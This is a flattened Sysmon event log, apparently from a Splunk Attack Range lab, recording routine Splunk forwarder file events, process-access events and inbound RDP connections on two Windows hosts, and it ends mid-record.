23542300x80000000000000001050182Microsoft-Windows-Sysmon/Operationalwin-dc-429.attackrange.local-2021-09-27 09:11:53.718{5EBD8912-7F53-614D-7700-00000000FC01}2312NT AUTHORITY\SYSTEMC:\Program Files\SplunkUniversalForwarder\bin\splunk-winevtlog.exeC:\Program Files\SplunkUniversalForwarder\var\lib\splunk\modinputs\WinEventLog\Microsoft-Windows-Sysmon_OperationalMD5=A50D64CE933155DFA82B4C5B13C98B85,SHA256=BA8F80BDE4D0CDC8CECF4500A1AEA029D00BC585A7B68FC05723CE075158CBD3,IMPHASH=00000000000000000000000000000000falsetrue 354300x8000000000000000978844Microsoft-Windows-Sysmon/Operationalwin-host-542.attackrange.local-2021-09-27 09:11:49.806{69CF5F33-7F33-614D-6600-00000000FD01}4076C:\Program Files\SplunkUniversalForwarder\etc\apps\Splunk_TA_stream\windows_x86_64\bin\streamfwd.exeNT AUTHORITY\SYSTEMtcptruefalse10.0.1.15win-host-542.attackrange.local59385-false10.0.1.12-8000- 354300x8000000000000000978843Microsoft-Windows-Sysmon/Operationalwin-host-542.attackrange.local-2021-09-27 09:11:49.518{69CF5F33-7F28-614D-1000-00000000FD01}944C:\Windows\System32\svchost.exeNT AUTHORITY\NETWORK SERVICEtcpfalsefalse87.236.208.231-54726-false10.0.1.15win-host-542.attackrange.local3389ms-wbt-server 23542300x80000000000000001050203Microsoft-Windows-Sysmon/Operationalwin-dc-429.attackrange.local-2021-09-27 09:11:54.980{5EBD8912-7F53-614D-7700-00000000FC01}2312NT AUTHORITY\SYSTEMC:\Program Files\SplunkUniversalForwarder\bin\splunk-winevtlog.exeC:\Program Files\SplunkUniversalForwarder\var\lib\splunk\modinputs\WinEventLog\SecurityMD5=6435383E018D02ACC47661D6BB353DE3,SHA256=EAFCD41A84B0384021282AB7B227E5468F5EAAEBD335E6B504659B2A1A0C4A18,IMPHASH=00000000000000000000000000000000falsetrue 23542300x80000000000000001050202Microsoft-Windows-Sysmon/Operationalwin-dc-429.attackrange.local-2021-09-27 09:11:54.980{5EBD8912-7F53-614D-7700-00000000FC01}2312NT AUTHORITY\SYSTEMC:\Program Files\SplunkUniversalForwarder\bin\splunk-winevtlog.exeC:\Program Files\SplunkUniversalForwarder\var\lib\splunk\modinputs\WinEventLog\SecurityMD5=5C2A43A6FA9F182DE0B6EFF302A961EA,SHA256=5018508F048C9E2805FF1F8F8299036BC125C2B7662769AC066ACB1E2BAFAA01,IMPHASH=00000000000000000000000000000000falsetrue 10341000x80000000000000001050201Microsoft-Windows-Sysmon/Operationalwin-dc-429.attackrange.local-2021-09-27 09:11:54.833{5EBD8912-8ADA-6151-367A-00000000FC01}37405424C:\Program Files\SplunkUniversalForwarder\bin\splunk-powershell.exe{5EBD8912-7F40-614D-2900-00000000FC01}2964C:\Program Files\SplunkUniversalForwarder\bin\splunkd.exe0x101400C:\Windows\SYSTEM32\ntdll.dll+a6134|C:\Windows\System32\KERNELBASE.dll+221bd|C:\Program Files\SplunkUniversalForwarder\bin\splunk-powershell.exe+55e675|C:\Program Files\SplunkUniversalForwarder\bin\splunk-powershell.exe+55e1a6|C:\Program Files\SplunkUniversalForwarder\bin\splunk-powershell.exe+6b453|C:\Program Files\SplunkUniversalForwarder\bin\splunk-powershell.exe+8e8530|C:\Windows\System32\KERNEL32.DLL+84d4|C:\Windows\SYSTEM32\ntdll.dll+51781 23542300x80000000000000001050200Microsoft-Windows-Sysmon/Operationalwin-dc-429.attackrange.local-2021-09-27 09:11:54.733{5EBD8912-7F53-614D-7700-00000000FC01}2312NT AUTHORITY\SYSTEMC:\Program Files\SplunkUniversalForwarder\bin\splunk-winevtlog.exeC:\Program Files\SplunkUniversalForwarder\var\lib\splunk\modinputs\WinEventLog\Microsoft-Windows-Sysmon_OperationalMD5=5A1DD0910258E578F8B19ABC22AF8B14,SHA256=20B7D400E66EA561997CD8B438D658DC1250914202EF31AF1C0C3BC9AC24D455,IMPHASH=00000000000000000000000000000000falsetrue 23542300x8000000000000000978847Microsoft-Windows-Sysmon/Operationalwin-host-542.attackrange.local-2021-09-27 09:11:54.367{69CF5F33-7F3A-614D-7000-00000000FD01}3160NT AUTHORITY\SYSTEMC:\Program Files\SplunkUniversalForwarder\bin\splunk-winevtlog.exeC:\Program Files\SplunkUniversalForwarder\var\lib\splunk\modinputs\WinEventLog\SecurityMD5=1AA477B895E95D6D9C7440D2FAB58297,SHA256=B3910CA4A6A298C17BF17DD8DD0932569839D4B37FBEB9B95CE73762A5581A1D,IMPHASH=00000000000000000000000000000000falsetrue 354300x8000000000000000978846Microsoft-Windows-Sysmon/Operationalwin-host-542.attackrange.local-2021-09-27 09:11:50.977{69CF5F33-7F28-614D-1000-00000000FD01}944C:\Windows\System32\svchost.exeNT AUTHORITY\NETWORK SERVICEtcpfalsefalse87.236.208.230-51516-false10.0.1.15win-host-542.attackrange.local3389ms-wbt-server 23542300x8000000000000000978845Microsoft-Windows-Sysmon/Operationalwin-host-542.attackrange.local-2021-09-27 09:11:54.132{69CF5F33-7F3A-614D-7000-00000000FD01}3160NT AUTHORITY\SYSTEMC:\Program Files\SplunkUniversalForwarder\bin\splunk-winevtlog.exeC:\Program Files\SplunkUniversalForwarder\var\lib\splunk\modinputs\WinEventLog\Microsoft-Windows-Sysmon_OperationalMD5=0E931D1EAF649E6CBAC5A6F38CC68F43,SHA256=8C50CD1D505C9E1EA627C0969A8ECF3F1252D9FE9682FA70A9BDC337A77B3246,IMPHASH=00000000000000000000000000000000falsetrue 10341000x80000000000000001050199Microsoft-Windows-Sysmon/Operationalwin-dc-429.attackrange.local-2021-09-27 09:11:54.664{5EBD8912-7F41-614D-3700-00000000FC01}33683388C:\Windows\system32\conhost.exe{5EBD8912-8ADA-6151-367A-00000000FC01}3740C:\Program Files\SplunkUniversalForwarder\bin\splunk-powershell.exe0x1fffffC:\Windows\SYSTEM32\ntdll.dll+a6134|C:\Windows\SYSTEM32\ConhostV2.dll+5ca7|C:\Windows\SYSTEM32\ConhostV2.dll+774b|C:\Windows\SYSTEM32\ConhostV2.dll+a8ef|C:\Windows\System32\KERNEL32.DLL+84d4|C:\Windows\SYSTEM32\ntdll.dll+51781 10341000x80000000000000001050198Microsoft-Windows-Sysmon/Operationalwin-dc-429.attackrange.local-2021-09-27 09:11:54.664{5EBD8912-7F2F-614D-0C00-00000000FC01}8285604C:\Windows\system32\svchost.exe{5EBD8912-7F40-614D-2D00-00000000FC01}2380C:\Windows\sysmon64.exe0x1400C:\Windows\SYSTEM32\ntdll.dll+a6134|C:\Windows\System32\KERNELBASE.dll+5eab4|c:\windows\system32\lsm.dll+fd18|C:\Windows\System32\RPCRT4.dll+7a593|C:\Windows\System32\RPCRT4.dll+d9f41|C:\Windows\System32\RPCRT4.dll+62d4c|C:\Windows\System32\RPCRT4.dll+4a274|C:\Windows\System32\RPCRT4.dll+4918d|C:\Windows\System32\RPCRT4.dll+49a3b|C:\Windows\System32\RPCRT4.dll+310ac|C:\Windows\System32\RPCRT4.dll+3152c|C:\Windows\System32\RPCRT4.dll+1ae1c|C:\Windows\System32\RPCRT4.dll+1c67b|C:\Windows\System32\RPCRT4.dll+43a2a|C:\Windows\SYSTEM32\ntdll.dll+1d34e|C:\Windows\SYSTEM32\ntdll.dll+1ecb9|C:\Windows\System32\KERNEL32.DLL+84d4|C:\Windows\SYSTEM32\ntdll.dll+51781 10341000x80000000000000001050197Microsoft-Windows-Sysmon/Operationalwin-dc-429.attackrange.local-2021-09-27 09:11:54.664{5EBD8912-7F2F-614D-0C00-00000000FC01}8285604C:\Windows\system32\svchost.exe{5EBD8912-7F40-614D-2D00-00000000FC01}2380C:\Windows\sysmon64.exe0x1400C:\Windows\SYSTEM32\ntdll.dll+a6134|C:\Windows\System32\KERNELBASE.dll+5eab4|c:\windows\system32\lsm.dll+11aad|C:\Windows\System32\RPCRT4.dll+7a593|C:\Windows\System32\RPCRT4.dll+d9f41|C:\Windows\System32\RPCRT4.dll+62d4c|C:\Windows\System32\RPCRT4.dll+4a274|C:\Windows\System32\RPCRT4.dll+4918d|C:\Windows\System32\RPCRT4.dll+49a3b|C:\Windows\System32\RPCRT4.dll+310ac|C:\Windows\System32\RPCRT4.dll+3152c|C:\Windows\System32\RPCRT4.dll+1ae1c|C:\Windows\System32\RPCRT4.dll+1c67b|C:\Windows\System32\RPCRT4.dll+43a2a|C:\Windows\SYSTEM32\ntdll.dll+1d34e|C:\Windows\SYSTEM32\ntdll.dll+1ecb9|C:\Windows\System32\KERNEL32.DLL+84d4|C:\Windows\SYSTEM32\ntdll.dll+51781 10341000x80000000000000001050196Microsoft-Windows-Sysmon/Operationalwin-dc-429.attackrange.local-2021-09-27 09:11:54.664{5EBD8912-7F2F-614D-0C00-00000000FC01}8285604C:\Windows\system32\svchost.exe{5EBD8912-7F40-614D-2D00-00000000FC01}2380C:\Windows\sysmon64.exe0x1400C:\Windows\SYSTEM32\ntdll.dll+a6134|C:\Windows\System32\KERNELBASE.dll+5eab4|c:\windows\system32\lsm.dll+11058|C:\Windows\System32\RPCRT4.dll+7a593|C:\Windows\System32\RPCRT4.dll+d9f41|C:\Windows\System32\RPCRT4.dll+62d4c|C:\Windows\System32\RPCRT4.dll+4a274|C:\Windows\System32\RPCRT4.dll+4918d|C:\Windows\System32\RPCRT4.dll+49a3b|C:\Windows\System32\RPCRT4.dll+310ac|C:\Windows\System32\RPCRT4.dll+3152c|C:\Windows\System32\RPCRT4.dll+1ae1c|C:\Windows\System32\RPCRT4.dll+1c67b|C:\Windows\System32\RPCRT4.dll+43a2a|C:\Windows\SYSTEM32\ntdll.dll+1d34e|C:\Windows\SYSTEM32\ntdll.dll+1ecb9|C:\Windows\System32\KERNEL32.DLL+84d4|C:\Windows\SYSTEM32\ntdll.dll+51781 10341000x80000000000000001050195Microsoft-Windows-Sysmon/Operationalwin-dc-429.attackrange.local-2021-09-27 09:11:54.664{5EBD8912-7F2F-614D-0C00-00000000FC01}8285604C:\Windows\system32\svchost.exe{5EBD8912-7F40-614D-2D00-00000000FC01}2380C:\Windows\sysmon64.exe0x1400C:\Windows\SYSTEM32\ntdll.dll+a6134|C:\Windows\System32\KERNELBASE.dll+5eab4|c:\windows\system32\lsm.dll+12023|C:\Windows\System32\RPCRT4.dll+7a593|C:\Windows\System32\RPCRT4.dll+d9f41|C:\Windows\System32\RPCRT4.dll+62d4c|C:\Windows\System32\RPCRT4.dll+4a274|C:\Windows\System32\RPCRT4.dll+4918d|C:\Windows\System32\RPCRT4.dll+49a3b|C:\Windows\System32\RPCRT4.dll+310ac|C:\Windows\System32\RPCRT4.dll+3152c|C:\Windows\System32\RPCRT4.dll+1ae1c|C:\Windows\System32\RPCRT4.dll+1c67b|C:\Windows\System32\RPCRT4.dll+43a2a|C:\Windows\SYSTEM32\ntdll.dll+1d34e|C:\Windows\SYSTEM32\ntdll.dll+1ecb9|C:\Windows\System32\KERNEL32.DLL+84d4|C:\Windows\SYSTEM32\ntdll.dll+51781 10341000x80000000000000001050194Microsoft-Windows-Sysmon/Operationalwin-dc-429.attackrange.local-2021-09-27 09:11:54.664{5EBD8912-7F2D-614D-0500-00000000FC01}408368C:\Windows\system32\csrss.exe{5EBD8912-8ADA-6151-367A-00000000FC01}3740C:\Program Files\SplunkUniversalForwarder\bin\splunk-powershell.exe0x1fffffC:\Windows\SYSTEM32\ntdll.dll+a6134|C:\Windows\system32\basesrv.DLL+2f47|C:\Windows\SYSTEM32\CSRSRV.dll+5645|C:\Windows\SYSTEM32\ntdll.dll+5178f 10341000x80000000000000001050193Microsoft-Windows-Sysmon/Operationalwin-dc-429.attackrange.local-2021-09-27 09:11:54.664{5EBD8912-7F40-614D-2900-00000000FC01}29643516C:\Program Files\SplunkUniversalForwarder\bin\splunkd.exe{5EBD8912-8ADA-6151-367A-00000000FC01}3740C:\Program Files\SplunkUniversalForwarder\bin\splunk-powershell.exe0x1fffffC:\Windows\SYSTEM32\ntdll.dll+a7404|C:\Windows\System32\KERNELBASE.dll+2b860|C:\Windows\System32\KERNELBASE.dll+6b246|C:\Windows\System32\KERNEL32.DLL+1c213|C:\Program Files\SplunkUniversalForwarder\bin\splunkd.exe+ce6a3b|C:\Program Files\SplunkUniversalForwarder\bin\splunkd.exe+17cade|C:\Program Files\SplunkUniversalForwarder\bin\splunkd.exe+18641d|C:\Program Files\SplunkUniversalForwarder\bin\splunkd.exe+17ef16|C:\Program Files\SplunkUniversalForwarder\bin\splunkd.exe+c992c4|C:\Program Files\SplunkUniversalForwarder\bin\splunkd.exe+18689b|C:\Program Files\SplunkUniversalForwarder\bin\splunkd.exe+189d3c|C:\Program Files\SplunkUniversalForwarder\bin\splunkd.exe+c95f5f|C:\Program Files\SplunkUniversalForwarder\bin\splunkd.exe+c99fad|C:\Program Files\SplunkUniversalForwarder\bin\splunkd.exe+184c5b|C:\Program Files\SplunkUniversalForwarder\bin\splunkd.exe+c7dd7e|C:\Windows\System32\ucrtbase.dll+1fb80|C:\Windows\System32\KERNEL32.DLL+84d4|C:\Windows\SYSTEM32\ntdll.dll+51781 154100x80000000000000001050192Microsoft-Windows-Sysmon/Operationalwin-dc-429.attackrange.local-2021-09-27 09:11:54.650{5EBD8912-8ADA-6151-367A-00000000FC01}3740C:\Program Files\SplunkUniversalForwarder\bin\splunk-powershell.exe-----"C:\Program Files\SplunkUniversalForwarder\bin\splunk-powershell.exe"C:\Windows\system32\NT AUTHORITY\SYSTEM{5EBD8912-7F2E-614D-E703-000000000000}0x3e70SystemMD5=030CC9FD3784684043D9236FF16904DE,SHA256=6C84A212BD1EA1FCC493E9F8ED1C1507E2773F6FE71ACDE265067F3153BE6241,IMPHASH=45491F0E80AC016364EB8FB78BD23A1C{5EBD8912-7F40-614D-2900-00000000FC01}2964C:\Program Files\SplunkUniversalForwarder\bin\splunkd.exe"C:\Program Files\SplunkUniversalForwarder\bin\splunkd.exe" service 10341000x80000000000000001050191Microsoft-Windows-Sysmon/Operationalwin-dc-429.attackrange.local-2021-09-27 09:11:54.149{5EBD8912-8AD9-6151-357A-00000000FC01}62405672C:\Program Files\SplunkUniversalForwarder\bin\splunk-regmon.exe{5EBD8912-7F40-614D-2900-00000000FC01}2964C:\Program Files\SplunkUniversalForwarder\bin\splunkd.exe0x101400C:\Windows\SYSTEM32\ntdll.dll+a6134|C:\Windows\System32\KERNELBASE.dll+221bd|C:\Program Files\SplunkUniversalForwarder\bin\splunk-regmon.exe+5691a5|C:\Program Files\SplunkUniversalForwarder\bin\splunk-regmon.exe+568cd6|C:\Program Files\SplunkUniversalForwarder\bin\splunk-regmon.exe+56657|C:\Program Files\SplunkUniversalForwarder\bin\splunk-regmon.exe+56ca7|C:\Program Files\SplunkUniversalForwarder\bin\splunk-regmon.exe+8f3800|C:\Windows\System32\KERNEL32.DLL+84d4|C:\Windows\SYSTEM32\ntdll.dll+51781 23542300x80000000000000001050214Microsoft-Windows-Sysmon/Operationalwin-dc-429.attackrange.local-2021-09-27 09:11:55.782{5EBD8912-7F53-614D-7700-00000000FC01}2312NT AUTHORITY\SYSTEMC:\Program Files\SplunkUniversalForwarder\bin\splunk-winevtlog.exeC:\Program Files\SplunkUniversalForwarder\var\lib\splunk\modinputs\WinEventLog\Microsoft-Windows-Sysmon_OperationalMD5=74F4A43F81933F8EA9340E15080B4B80,SHA256=C4A7CBC6D81764A0ED14B1734139E92419715F2C2A12EA7F08AEF33469C408AA,IMPHASH=00000000000000000000000000000000falsetrue 23542300x8000000000000000978848Microsoft-Windows-Sysmon/Operationalwin-host-542.attackrange.local-2021-09-27 09:11:55.367{69CF5F33-7F3A-614D-7000-00000000FD01}3160NT AUTHORITY\SYSTEMC:\Program Files\SplunkUniversalForwarder\bin\splunk-winevtlog.exeC:\Program Files\SplunkUniversalForwarder\var\lib\splunk\modinputs\WinEventLog\Microsoft-Windows-Sysmon_OperationalMD5=E761B9E1A2DF427FAFE75D6934507D39,SHA256=5D569B38C1DAB1DA390FF7126E2921675C07AA4A3C51736D08387BE78B0058E6,IMPHASH=00000000000000000000000000000000falsetrue 10341000x80000000000000001050213Microsoft-Windows-Sysmon/Operationalwin-dc-429.attackrange.local-2021-09-27 09:11:55.600{5EBD8912-8ADB-6151-377A-00000000FC01}47204232C:\Program Files\SplunkUniversalForwarder\bin\splunk-powershell.exe{5EBD8912-7F40-614D-2900-00000000FC01}2964C:\Program Files\SplunkUniversalForwarder\bin\splunkd.exe0x101400C:\Windows\SYSTEM32\ntdll.dll+a6134|C:\Windows\System32\KERNELBASE.dll+221bd|C:\Program Files\SplunkUniversalForwarder\bin\splunk-powershell.exe+55e675|C:\Program Files\SplunkUniversalForwarder\bin\splunk-powershell.exe+55e1a6|C:\Program Files\SplunkUniversalForwarder\bin\splunk-powershell.exe+6b453|C:\Program Files\SplunkUniversalForwarder\bin\splunk-powershell.exe+8e8530|C:\Windows\System32\KERNEL32.DLL+84d4|C:\Windows\SYSTEM32\ntdll.dll+51781 354300x80000000000000001050212Microsoft-Windows-Sysmon/Operationalwin-dc-429.attackrange.local-2021-09-27 09:11:53.476{5EBD8912-7F30-614D-0F00-00000000FC01}288C:\Windows\System32\svchost.exeNT AUTHORITY\NETWORK SERVICEtcpfalsefalse87.236.208.230-52293-false10.0.1.14win-dc-429.attackrange.local3389ms-wbt-server 10341000x80000000000000001050211Microsoft-Windows-Sysmon/Operationalwin-dc-429.attackrange.local-2021-09-27 09:11:55.349{5EBD8912-7F41-614D-3700-00000000FC01}33683388C:\Windows\system32\conhost.exe{5EBD8912-8ADB-6151-377A-00000000FC01}4720C:\Program Files\SplunkUniversalForwarder\bin\splunk-powershell.exe0x1fffffC:\Windows\SYSTEM32\ntdll.dll+a6134|C:\Windows\SYSTEM32\ConhostV2.dll+5ca7|C:\Windows\SYSTEM32\ConhostV2.dll+774b|C:\Windows\SYSTEM32\ConhostV2.dll+a8ef|C:\Windows\System32\KERNEL32.DLL+84d4|C:\Windows\SYSTEM32\ntdll.dll+51781 10341000x80000000000000001050210Microsoft-Windows-Sysmon/Operationalwin-dc-429.attackrange.local-2021-09-27 09:11:55.349{5EBD8912-7F2F-614D-0C00-00000000FC01}8285604C:\Windows\system32\svchost.exe{5EBD8912-7F40-614D-2D00-00000000FC01}2380C:\Windows\sysmon64.exe0x1400C:\Windows\SYSTEM32\ntdll.dll+a6134|C:\Windows\System32\KERNELBASE.dll+5eab4|c:\windows\system32\lsm.dll+fd18|C:\Windows\System32\RPCRT4.dll+7a593|C:\Windows\System32\RPCRT4.dll+d9f41|C:\Windows\System32\RPCRT4.dll+62d4c|C:\Windows\System32\RPCRT4.dll+4a274|C:\Windows\System32\RPCRT4.dll+4918d|C:\Windows\System32\RPCRT4.dll+49a3b|C:\Windows\System32\RPCRT4.dll+310ac|C:\Windows\System32\RPCRT4.dll+3152c|C:\Windows\System32\RPCRT4.dll+1ae1c|C:\Windows\System32\RPCRT4.dll+1c67b|C:\Windows\System32\RPCRT4.dll+43a2a|C:\Windows\SYSTEM32\ntdll.dll+1d34e|C:\Windows\SYSTEM32\ntdll.dll+1ecb9|C:\Windows\System32\KERNEL32.DLL+84d4|C:\Windows\SYSTEM32\ntdll.dll+51781 10341000x80000000000000001050209Microsoft-Windows-Sysmon/Operationalwin-dc-429.attackrange.local-2021-09-27 09:11:55.349{5EBD8912-7F2F-614D-0C00-00000000FC01}8285604C:\Windows\system32\svchost.exe{5EBD8912-7F40-614D-2D00-00000000FC01}2380C:\Windows\sysmon64.exe0x1400C:\Windows\SYSTEM32\ntdll.dll+a6134|C:\Windows\System32\KERNELBASE.dll+5eab4|c:\windows\system32\lsm.dll+11aad|C:\Windows\System32\RPCRT4.dll+7a593|C:\Windows\System32\RPCRT4.dll+d9f41|C:\Windows\System32\RPCRT4.dll+62d4c|C:\Windows\System32\RPCRT4.dll+4a274|C:\Windows\System32\RPCRT4.dll+4918d|C:\Windows\System32\RPCRT4.dll+49a3b|C:\Windows\System32\RPCRT4.dll+310ac|C:\Windows\System32\RPCRT4.dll+3152c|C:\Windows\System32\RPCRT4.dll+1ae1c|C:\Windows\System32\RPCRT4.dll+1c67b|C:\Windows\System32\RPCRT4.dll+43a2a|C:\Windows\SYSTEM32\ntdll.dll+1d34e|C:\Windows\SYSTEM32\ntdll.dll+1ecb9|C:\Windows\System32\KERNEL32.DLL+84d4|C:\Windows\SYSTEM32\ntdll.dll+51781 10341000x80000000000000001050208Microsoft-Windows-Sysmon/Operationalwin-dc-429.attackrange.local-2021-09-27 09:11:55.349{5EBD8912-7F2F-614D-0C00-00000000FC01}8285604C:\Windows\system32\svchost.exe{5EBD8912-7F40-614D-2D00-00000000FC01}2380C:\Windows\sysmon64.exe0x1400C:\Windows\SYSTEM32\ntdll.dll+a6134|C:\Windows\System32\KERNELBASE.dll+5eab4|c:\windows\system32\lsm.dll+11058|C:\Windows\System32\RPCRT4.dll+7a593|C:\Windows\System32\RPCRT4.dll+d9f41|C:\Windows\System32\RPCRT4.dll+62d4c|C:\Windows\System32\RPCRT4.dll+4a274|C:\Windows\System32\RPCRT4.dll+4918d|C:\Windows\System32\RPCRT4.dll+49a3b|C:\Windows\System32\RPCRT4.dll+310ac|C:\Windows\System32\RPCRT4.dll+3152c|C:\Windows\System32\RPCRT4.dll+1ae1c|C:\Windows\System32\RPCRT4.dll+1c67b|C:\Windows\System32\RPCRT4.dll+43a2a|C:\Windows\SYSTEM32\ntdll.dll+1d34e|C:\Windows\SYSTEM32\ntdll.dll+1ecb9|C:\Windows\System32\KERNEL32.DLL+84d4|C:\Windows\SYSTEM32\ntdll.dll+51781 10341000x80000000000000001050207Microsoft-Windows-Sysmon/Operationalwin-dc-429.attackrange.local-2021-09-27 09:11:55.349{5EBD8912-7F2F-614D-0C00-00000000FC01}8285604C:\Windows\system32\svchost.exe{5EBD8912-7F40-614D-2D00-00000000FC01}2380C:\Windows\sysmon64.exe0x1400C:\Windows\SYSTEM32\ntdll.dll+a6134|C:\Windows\System32\KERNELBASE.dll+5eab4|c:\windows\system32\lsm.dll+12023|C:\Windows\System32\RPCRT4.dll+7a593|C:\Windows\System32\RPCRT4.dll+d9f41|C:\Windows\System32\RPCRT4.dll+62d4c|C:\Windows\System32\RPCRT4.dll+4a274|C:\Windows\System32\RPCRT4.dll+4918d|C:\Windows\System32\RPCRT4.dll+49a3b|C:\Windows\System32\RPCRT4.dll+310ac|C:\Windows\System32\RPCRT4.dll+3152c|C:\Windows\System32\RPCRT4.dll+1ae1c|C:\Windows\System32\RPCRT4.dll+1c67b|C:\Windows\System32\RPCRT4.dll+43a2a|C:\Windows\SYSTEM32\ntdll.dll+1d34e|C:\Windows\SYSTEM32\ntdll.dll+1ecb9|C:\Windows\System32\KERNEL32.DLL+84d4|C:\Windows\SYSTEM32\ntdll.dll+51781 10341000x80000000000000001050206Microsoft-Windows-Sysmon/Operationalwin-dc-429.attackrange.local-2021-09-27 09:11:55.349{5EBD8912-7F2D-614D-0500-00000000FC01}408424C:\Windows\system32\csrss.exe{5EBD8912-8ADB-6151-377A-00000000FC01}4720C:\Program Files\SplunkUniversalForwarder\bin\splunk-powershell.exe0x1fffffC:\Windows\SYSTEM32\ntdll.dll+a6134|C:\Windows\system32\basesrv.DLL+2f47|C:\Windows\SYSTEM32\CSRSRV.dll+5645|C:\Windows\SYSTEM32\ntdll.dll+5178f 10341000x80000000000000001050205Microsoft-Windows-Sysmon/Operationalwin-dc-429.attackrange.local-2021-09-27 09:11:55.349{5EBD8912-7F40-614D-2900-00000000FC01}29643516C:\Program Files\SplunkUniversalForwarder\bin\splunkd.exe{5EBD8912-8ADB-6151-377A-00000000FC01}4720C:\Program Files\SplunkUniversalForwarder\bin\splunk-powershell.exe0x1fffffC:\Windows\SYSTEM32\ntdll.dll+a7404|C:\Windows\System32\KERNELBASE.dll+2b860|C:\Windows\System32\KERNELBASE.dll+6b246|C:\Windows\System32\KERNEL32.DLL+1c213|C:\Program Files\SplunkUniversalForwarder\bin\splunkd.exe+ce6a3b|C:\Program Files\SplunkUniversalForwarder\bin\splunkd.exe+17cade|C:\Program Files\SplunkUniversalForwarder\bin\splunkd.exe+18641d|C:\Program Files\SplunkUniversalForwarder\bin\splunkd.exe+17ef16|C:\Program Files\SplunkUniversalForwarder\bin\splunkd.exe+c992c4|C:\Program Files\SplunkUniversalForwarder\bin\splunkd.exe+18689b|C:\Program Files\SplunkUniversalForwarder\bin\splunkd.exe+189d3c|C:\Program Files\SplunkUniversalForwarder\bin\splunkd.exe+c95f5f|C:\Program Files\SplunkUniversalForwarder\bin\splunkd.exe+c99fad|C:\Program Files\SplunkUniversalForwarder\bin\splunkd.exe+184c5b|C:\Program Files\SplunkUniversalForwarder\bin\splunkd.exe+c7dd7e|C:\Windows\System32\ucrtbase.dll+1fb80|C:\Windows\System32\KERNEL32.DLL+84d4|C:\Windows\SYSTEM32\ntdll.dll+51781 154100x80000000000000001050204Microsoft-Windows-Sysmon/Operationalwin-dc-429.attackrange.local-2021-09-27 09:11:55.334{5EBD8912-8ADB-6151-377A-00000000FC01}4720C:\Program Files\SplunkUniversalForwarder\bin\splunk-powershell.exe-----"C:\Program Files\SplunkUniversalForwarder\bin\splunk-powershell.exe" --ps2C:\Windows\system32\NT AUTHORITY\SYSTEM{5EBD8912-7F2E-614D-E703-000000000000}0x3e70SystemMD5=030CC9FD3784684043D9236FF16904DE,SHA256=6C84A212BD1EA1FCC493E9F8ED1C1507E2773F6FE71ACDE265067F3153BE6241,IMPHASH=45491F0E80AC016364EB8FB78BD23A1C{5EBD8912-7F40-614D-2900-00000000FC01}2964C:\Program Files\SplunkUniversalForwarder\bin\splunkd.exe"C:\Program Files\SplunkUniversalForwarder\bin\splunkd.exe" service 23542300x80000000000000001050224Microsoft-Windows-Sysmon/Operationalwin-dc-429.attackrange.local-2021-09-27 09:11:56.782{5EBD8912-7F53-614D-7700-00000000FC01}2312NT AUTHORITY\SYSTEMC:\Program Files\SplunkUniversalForwarder\bin\splunk-winevtlog.exeC:\Program Files\SplunkUniversalForwarder\var\lib\splunk\modinputs\WinEventLog\Microsoft-Windows-Sysmon_OperationalMD5=BAD51E1E80323B8C11D77E6B0ADA4C89,SHA256=1D5D3BE52DF0C04D4B7C057A9B7F0A8218366F061DE326D6C3735988A906FC2F,IMPHASH=00000000000000000000000000000000falsetrue 23542300x8000000000000000978849Microsoft-Windows-Sysmon/Operationalwin-host-542.attackrange.local-2021-09-27 09:11:56.398{69CF5F33-7F3A-614D-7000-00000000FD01}3160NT AUTHORITY\SYSTEMC:\Program Files\SplunkUniversalForwarder\bin\splunk-winevtlog.exeC:\Program Files\SplunkUniversalForwarder\var\lib\splunk\modinputs\WinEventLog\Microsoft-Windows-Sysmon_OperationalMD5=5B49AB4143204C9B227EE10D48ADDAB8,SHA256=3A819C4A11886B203BEF88ED76DD85054DE5F9C97B924F7C68FC686E93849410,IMPHASH=00000000000000000000000000000000falsetrue 23542300x80000000000000001050223Microsoft-Windows-Sysmon/Operationalwin-dc-429.attackrange.local-2021-09-27 09:11:56.351{5EBD8912-7F53-614D-7700-00000000FC01}2312NT AUTHORITY\SYSTEMC:\Program Files\SplunkUniversalForwarder\bin\splunk-winevtlog.exeC:\Program Files\SplunkUniversalForwarder\var\lib\splunk\modinputs\WinEventLog\SecurityMD5=6435383E018D02ACC47661D6BB353DE3,SHA256=EAFCD41A84B0384021282AB7B227E5468F5EAAEBD335E6B504659B2A1A0C4A18,IMPHASH=00000000000000000000000000000000falsetrue 10341000x80000000000000001050222Microsoft-Windows-Sysmon/Operationalwin-dc-429.attackrange.local-2021-09-27 09:11:56.034{5EBD8912-7F41-614D-3700-00000000FC01}33683388C:\Windows\system32\conhost.exe{5EBD8912-8ADC-6151-387A-00000000FC01}3576C:\Program Files\SplunkUniversalForwarder\bin\splunk-winprintmon.exe0x1fffffC:\Windows\SYSTEM32\ntdll.dll+a6134|C:\Windows\SYSTEM32\ConhostV2.dll+5ca7|C:\Windows\SYSTEM32\ConhostV2.dll+774b|C:\Windows\SYSTEM32\ConhostV2.dll+a8ef|C:\Windows\System32\KERNEL32.DLL+84d4|C:\Windows\SYSTEM32\ntdll.dll+51781 10341000x80000000000000001050221Microsoft-Windows-Sysmon/Operationalwin-dc-429.attackrange.local-2021-09-27 09:11:56.034{5EBD8912-7F2F-614D-0C00-00000000FC01}8285604C:\Windows\system32\svchost.exe{5EBD8912-7F40-614D-2D00-00000000FC01}2380C:\Windows\sysmon64.exe0x1400C:\Windows\SYSTEM32\ntdll.dll+a6134|C:\Windows\System32\KERNELBASE.dll+5eab4|c:\windows\system32\lsm.dll+fd18|C:\Windows\System32\RPCRT4.dll+7a593|C:\Windows\System32\RPCRT4.dll+d9f41|C:\Windows\System32\RPCRT4.dll+62d4c|C:\Windows\System32\RPCRT4.dll+4a274|C:\Windows\System32\RPCRT4.dll+4918d|C:\Windows\System32\RPCRT4.dll+49a3b|C:\Windows\System32\RPCRT4.dll+310ac|C:\Windows\System32\RPCRT4.dll+3152c|C:\Windows\System32\RPCRT4.dll+1ae1c|C:\Windows\System32\RPCRT4.dll+1c67b|C:\Windows\System32\RPCRT4.dll+43a2a|C:\Windows\SYSTEM32\ntdll.dll+1d34e|C:\Windows\SYSTEM32\ntdll.dll+1ecb9|C:\Windows\System32\KERNEL32.DLL+84d4|C:\Windows\SYSTEM32\ntdll.dll+51781 10341000x80000000000000001050220Microsoft-Windows-Sysmon/Operationalwin-dc-429.attackrange.local-2021-09-27 